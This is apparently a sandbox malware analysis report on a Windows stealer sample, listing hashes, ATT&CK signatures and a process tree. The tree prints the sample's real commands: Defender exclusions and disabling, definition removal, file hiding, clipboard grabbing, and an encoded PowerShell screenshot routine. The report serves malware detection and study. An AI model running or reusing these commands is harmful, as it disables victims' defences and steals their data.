c47728e637b01964912acba065ce0c7da8a29a97cac34f9a1e2584e1d5371019

Analysis

max time kernel
105s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
13/04/2025, 16:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
Size

7.9MB
MD5

36d84ce13dea34450616cedd25bc125e
SHA1

107ae3b9c9c2a20b6463090da6cf196783411803
SHA256

c47728e637b01964912acba065ce0c7da8a29a97cac34f9a1e2584e1d5371019
SHA512

f0703a425059bd5443331c6664a5fb0c1d6021c7979cf7770847361833ec3b76457a7bfd34c6fd1e7de624dc864d6b1e9bde1c8187458fd14c8c4cd05b039e65
SSDEEP

196608:eW4IdNTwhLOCoFeNlpYfMQc2s2k0ax8Ehn6ksqdhb:NKL1CMQb5axbhZdhb

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3376	powershell.exe
1016	powershell.exe
1920	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3496	cmd.exe
1748	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4832	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
5980	tasklist.exe
5076	tasklist.exe
3684	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3564	cmd.exe

UPX packed file 50 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000024338-66.dat	upx
behavioral1/memory/4512-70-0x00007FFD53EC0000-0x00007FFD544A9000-memory.dmp	upx
behavioral1/files/0x0007000000024301-73.dat	upx
behavioral1/memory/4512-75-0x00007FFD694B0000-0x00007FFD694D4000-memory.dmp	upx
behavioral1/files/0x0007000000024336-74.dat	upx
behavioral1/files/0x0007000000024303-130.dat	upx
behavioral1/files/0x0007000000024302-129.dat	upx
behavioral1/files/0x0007000000024300-128.dat	upx
behavioral1/files/0x000700000002433e-127.dat	upx
behavioral1/files/0x000700000002433c-126.dat	upx
behavioral1/memory/4512-132-0x00007FFD68640000-0x00007FFD6866D000-memory.dmp	upx
behavioral1/memory/4512-131-0x00007FFD6AF80000-0x00007FFD6AF99000-memory.dmp	upx
behavioral1/files/0x000700000002433b-125.dat	upx
behavioral1/files/0x0007000000024337-122.dat	upx
behavioral1/files/0x0007000000024335-121.dat	upx
behavioral1/memory/4512-77-0x00007FFD6C960000-0x00007FFD6C96F000-memory.dmp	upx
behavioral1/memory/4512-137-0x00007FFD63ED0000-0x00007FFD63EF3000-memory.dmp	upx
behavioral1/memory/4512-138-0x00007FFD53D50000-0x00007FFD53EC0000-memory.dmp	upx
behavioral1/memory/4512-139-0x00007FFD693E0000-0x00007FFD693F9000-memory.dmp	upx
behavioral1/memory/4512-140-0x00007FFD68630000-0x00007FFD6863D000-memory.dmp	upx
behavioral1/memory/4512-141-0x00007FFD63C80000-0x00007FFD63CAE000-memory.dmp	upx
behavioral1/memory/4512-144-0x00007FFD63890000-0x00007FFD63948000-memory.dmp	upx
behavioral1/memory/4512-145-0x00007FFD539D0000-0x00007FFD53D45000-memory.dmp	upx
behavioral1/memory/4512-143-0x00007FFD694B0000-0x00007FFD694D4000-memory.dmp	upx
behavioral1/memory/4512-142-0x00007FFD53EC0000-0x00007FFD544A9000-memory.dmp	upx
behavioral1/memory/4512-147-0x00007FFD63EB0000-0x00007FFD63EC4000-memory.dmp	upx
behavioral1/memory/4512-148-0x00007FFD63D50000-0x00007FFD63D5D000-memory.dmp	upx
behavioral1/memory/4512-149-0x00007FFD53580000-0x00007FFD5369C000-memory.dmp	upx
behavioral1/memory/4512-150-0x00007FFD63ED0000-0x00007FFD63EF3000-memory.dmp	upx
behavioral1/memory/4512-152-0x00007FFD53D50000-0x00007FFD53EC0000-memory.dmp	upx
behavioral1/memory/4512-154-0x00007FFD693E0000-0x00007FFD693F9000-memory.dmp	upx
behavioral1/memory/4512-198-0x00007FFD63C80000-0x00007FFD63CAE000-memory.dmp	upx
behavioral1/memory/4512-235-0x00007FFD539D0000-0x00007FFD53D45000-memory.dmp	upx
behavioral1/memory/4512-234-0x00007FFD63890000-0x00007FFD63948000-memory.dmp	upx
behavioral1/memory/4512-260-0x00007FFD53580000-0x00007FFD5369C000-memory.dmp	upx
behavioral1/memory/4512-261-0x00007FFD53EC0000-0x00007FFD544A9000-memory.dmp	upx
behavioral1/memory/4512-285-0x00007FFD63890000-0x00007FFD63948000-memory.dmp	upx
behavioral1/memory/4512-286-0x00007FFD539D0000-0x00007FFD53D45000-memory.dmp	upx
behavioral1/memory/4512-284-0x00007FFD63C80000-0x00007FFD63CAE000-memory.dmp	upx
behavioral1/memory/4512-283-0x00007FFD68630000-0x00007FFD6863D000-memory.dmp	upx
behavioral1/memory/4512-282-0x00007FFD693E0000-0x00007FFD693F9000-memory.dmp	upx
behavioral1/memory/4512-281-0x00007FFD53D50000-0x00007FFD53EC0000-memory.dmp	upx
behavioral1/memory/4512-280-0x00007FFD63ED0000-0x00007FFD63EF3000-memory.dmp	upx
behavioral1/memory/4512-279-0x00007FFD694B0000-0x00007FFD694D4000-memory.dmp	upx
behavioral1/memory/4512-278-0x00007FFD6AF80000-0x00007FFD6AF99000-memory.dmp	upx
behavioral1/memory/4512-277-0x00007FFD6C960000-0x00007FFD6C96F000-memory.dmp	upx
behavioral1/memory/4512-276-0x00007FFD68640000-0x00007FFD6866D000-memory.dmp	upx
behavioral1/memory/4512-275-0x00007FFD53580000-0x00007FFD5369C000-memory.dmp	upx
behavioral1/memory/4512-274-0x00007FFD63D50000-0x00007FFD63D5D000-memory.dmp	upx
behavioral1/memory/4512-273-0x00007FFD63EB0000-0x00007FFD63EC4000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5316	cmd.exe
412	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
316	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1816	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
412	PING.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
1016	powershell.exe
3376	powershell.exe
3376	powershell.exe
3376	powershell.exe
3376	powershell.exe
1748	powershell.exe
1748	powershell.exe
1016	powershell.exe
1016	powershell.exe
2532	powershell.exe
2532	powershell.exe
1748	powershell.exe
2532	powershell.exe
1920	powershell.exe
1920	powershell.exe
4728	powershell.exe
4728	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	5076	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3488	WMIC.exe
Token: SeSecurityPrivilege	3488	WMIC.exe
Token: SeTakeOwnershipPrivilege	3488	WMIC.exe
Token: SeLoadDriverPrivilege	3488	WMIC.exe
Token: SeSystemProfilePrivilege	3488	WMIC.exe
Token: SeSystemtimePrivilege	3488	WMIC.exe
Token: SeProfSingleProcessPrivilege	3488	WMIC.exe
Token: SeIncBasePriorityPrivilege	3488	WMIC.exe
Token: SeCreatePagefilePrivilege	3488	WMIC.exe
Token: SeBackupPrivilege	3488	WMIC.exe
Token: SeRestorePrivilege	3488	WMIC.exe
Token: SeShutdownPrivilege	3488	WMIC.exe
Token: SeDebugPrivilege	3488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3488	WMIC.exe
Token: SeRemoteShutdownPrivilege	3488	WMIC.exe
Token: SeUndockPrivilege	3488	WMIC.exe
Token: SeManageVolumePrivilege	3488	WMIC.exe
Token: 33	3488	WMIC.exe
Token: 34	3488	WMIC.exe
Token: 35	3488	WMIC.exe
Token: 36	3488	WMIC.exe
Token: SeDebugPrivilege	5980	tasklist.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeIncreaseQuotaPrivilege	3488	WMIC.exe
Token: SeSecurityPrivilege	3488	WMIC.exe
Token: SeTakeOwnershipPrivilege	3488	WMIC.exe
Token: SeLoadDriverPrivilege	3488	WMIC.exe
Token: SeSystemProfilePrivilege	3488	WMIC.exe
Token: SeSystemtimePrivilege	3488	WMIC.exe
Token: SeProfSingleProcessPrivilege	3488	WMIC.exe
Token: SeIncBasePriorityPrivilege	3488	WMIC.exe
Token: SeCreatePagefilePrivilege	3488	WMIC.exe
Token: SeBackupPrivilege	3488	WMIC.exe
Token: SeRestorePrivilege	3488	WMIC.exe
Token: SeShutdownPrivilege	3488	WMIC.exe
Token: SeDebugPrivilege	3488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3488	WMIC.exe
Token: SeRemoteShutdownPrivilege	3488	WMIC.exe
Token: SeUndockPrivilege	3488	WMIC.exe
Token: SeManageVolumePrivilege	3488	WMIC.exe
Token: 33	3488	WMIC.exe
Token: 34	3488	WMIC.exe
Token: 35	3488	WMIC.exe
Token: 36	3488	WMIC.exe
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	3684	tasklist.exe
Token: SeIncreaseQuotaPrivilege	968	WMIC.exe
Token: SeSecurityPrivilege	968	WMIC.exe
Token: SeTakeOwnershipPrivilege	968	WMIC.exe
Token: SeLoadDriverPrivilege	968	WMIC.exe
Token: SeSystemProfilePrivilege	968	WMIC.exe
Token: SeSystemtimePrivilege	968	WMIC.exe
Token: SeProfSingleProcessPrivilege	968	WMIC.exe
Token: SeIncBasePriorityPrivilege	968	WMIC.exe
Token: SeCreatePagefilePrivilege	968	WMIC.exe
Token: SeBackupPrivilege	968	WMIC.exe
Token: SeRestorePrivilege	968	WMIC.exe
Token: SeShutdownPrivilege	968	WMIC.exe
Token: SeDebugPrivilege	968	WMIC.exe
Token: SeSystemEnvironmentPrivilege	968	WMIC.exe
Token: SeRemoteShutdownPrivilege	968	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5732 wrote to memory of 4512	5732	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	85
PID 5732 wrote to memory of 4512	5732	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	85
PID 4512 wrote to memory of 4316	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	89
PID 4512 wrote to memory of 4316	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	89
PID 4512 wrote to memory of 2416	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	90
PID 4512 wrote to memory of 2416	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	90
PID 4512 wrote to memory of 5496	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	91
PID 4512 wrote to memory of 5496	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	91
PID 4512 wrote to memory of 3564	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	92
PID 4512 wrote to memory of 3564	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	92
PID 4316 wrote to memory of 3376	4316	cmd.exe	97
PID 4316 wrote to memory of 3376	4316	cmd.exe	97
PID 2416 wrote to memory of 1016	2416	cmd.exe	98
PID 2416 wrote to memory of 1016	2416	cmd.exe	98
PID 4512 wrote to memory of 1040	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	99
PID 4512 wrote to memory of 1040	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	99
PID 4512 wrote to memory of 5256	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	100
PID 4512 wrote to memory of 5256	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	100
PID 4512 wrote to memory of 4208	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	103
PID 4512 wrote to memory of 4208	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	103
PID 3564 wrote to memory of 1528	3564	cmd.exe	104
PID 3564 wrote to memory of 1528	3564	cmd.exe	104
PID 4512 wrote to memory of 3496	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	105
PID 4512 wrote to memory of 3496	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	105
PID 4512 wrote to memory of 1220	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	106
PID 4512 wrote to memory of 1220	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	106
PID 4512 wrote to memory of 5740	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	110
PID 4512 wrote to memory of 5740	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	110
PID 4512 wrote to memory of 2952	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	109
PID 4512 wrote to memory of 2952	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	109
PID 4512 wrote to memory of 3176	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	112
PID 4512 wrote to memory of 3176	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	112
PID 5496 wrote to memory of 4608	5496	cmd.exe	115
PID 5496 wrote to memory of 4608	5496	cmd.exe	115
PID 1040 wrote to memory of 5076	1040	cmd.exe	117
PID 1040 wrote to memory of 5076	1040	cmd.exe	117
PID 5256 wrote to memory of 5980	5256	cmd.exe	118
PID 5256 wrote to memory of 5980	5256	cmd.exe	118
PID 4208 wrote to memory of 3488	4208	cmd.exe	119
PID 4208 wrote to memory of 3488	4208	cmd.exe	119
PID 3496 wrote to memory of 1748	3496	cmd.exe	120
PID 3496 wrote to memory of 1748	3496	cmd.exe	120
PID 5740 wrote to memory of 1816	5740	cmd.exe	121
PID 5740 wrote to memory of 1816	5740	cmd.exe	121
PID 1220 wrote to memory of 3684	1220	cmd.exe	122
PID 1220 wrote to memory of 3684	1220	cmd.exe	122
PID 2952 wrote to memory of 1376	2952	cmd.exe	123
PID 2952 wrote to memory of 1376	2952	cmd.exe	123
PID 3176 wrote to memory of 2532	3176	cmd.exe	124
PID 3176 wrote to memory of 2532	3176	cmd.exe	124
PID 4512 wrote to memory of 1768	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	126
PID 4512 wrote to memory of 1768	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	126
PID 1768 wrote to memory of 440	1768	cmd.exe	128
PID 1768 wrote to memory of 440	1768	cmd.exe	128
PID 4512 wrote to memory of 5324	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	129
PID 4512 wrote to memory of 5324	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	129
PID 5324 wrote to memory of 5292	5324	cmd.exe	131
PID 5324 wrote to memory of 5292	5324	cmd.exe	131
PID 4512 wrote to memory of 5304	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	132
PID 4512 wrote to memory of 5304	4512	2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe	132
PID 2532 wrote to memory of 3368	2532	powershell.exe	134
PID 2532 wrote to memory of 3368	2532	powershell.exe	134
PID 5304 wrote to memory of 4768	5304	cmd.exe	135
PID 5304 wrote to memory of 4768	5304	cmd.exe	135

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1528	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5732
- C:\Users\Admin\AppData\Local\Temp\2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe
  "C:\Users\Admin\AppData\Local\Temp\2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ваша подписка или пробный период истекли. К сожалению, доступ к Flus DLC ограничен, так как это платный продукт. Сотрудничайте с нами и получайте эксклюзивные бонусы, включая бесплатный доступ к нашему софту!', 0, 'Unauthorized HWID', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5496
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ваша подписка или пробный период истекли. К сожалению, доступ к Flus DLC ограничен, так как это платный продукт. Сотрудничайте с нами и получайте эксклюзивные бонусы, включая бесплатный доступ к нашему софту!', 0, 'Unauthorized HWID', 0+16);close()"
      4⤵
      PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3564
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2025-04-13_36d84ce13dea34450616cedd25bc125e_black-basta_cobalt-strike_satacom.exe"
      4⤵
      Views/modifies file attributes
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1040
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5256
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4208
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1220
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2952
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5740
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQ